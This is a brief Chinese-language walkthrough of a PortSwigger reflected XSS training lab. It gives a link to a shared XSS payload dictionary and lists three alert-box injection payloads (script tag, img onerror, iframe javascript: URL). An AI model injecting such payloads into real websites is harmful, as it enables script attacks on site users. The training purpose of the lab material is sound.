burpsuite靶场----XSS----反射型XSS1
burpsuite靶场----XSS----反射型XSS1
靶场地址
https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded
XSS利用字典
链接:https://pan.baidu.com/s/1XAJbEc4o824zAAmvV85TOA
提取码:1234
正式开始
1.先输入一大长串字符
2.查看源码,找到输入的长串字符所在位置
3.本关的目标是弹窗
payload1:<script>alert(1)</script>
payload2:<img src=x onerror=alert(1)>
payload3:<iframe src=javascript:alert(1)>
等等